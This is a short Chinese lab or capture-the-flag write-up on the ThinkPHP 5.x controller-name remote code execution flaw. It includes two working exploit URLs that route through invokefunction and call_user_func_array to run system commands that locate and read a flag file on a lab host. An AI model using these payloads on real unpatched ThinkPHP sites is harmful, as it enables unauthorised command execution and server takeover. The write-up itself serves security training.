分享

ThinkPHP5框架漏洞

 新用户88342ytu 2021-09-09

PHP_RCE

【实验原理】

ThinkPHP5框架底层对控制器名过滤不严,可以通过url调用到ThinkPHP框架内部的敏感函数,进而导致getshell漏洞。

【实验目的】

掌握框架漏洞

【实验环境】

Windows

【实验工具】

firefox

【实验步骤】

1.根据主页提示,可以发现网页使用的是ThinkPHP框架,版本为5.1

2.此版本存在getshell漏洞(百度一下poc一抓一大把)

3.查找flag

http://192.168.100.161:54064/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%20%22flag%22

4.查看flag,如图所示

http://192.168.100.161:54064/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag

    本站是提供个人知识管理的网络存储空间,所有内容均由用户发布,不代表本站观点。请注意甄别内容中的联系方式、诱导购买等信息,谨防诈骗。如发现有害或侵权内容,请点击一键举报。
    转藏 分享 献花(0

    0条评论

    发表

    请遵守用户 评论公约

    类似文章 更多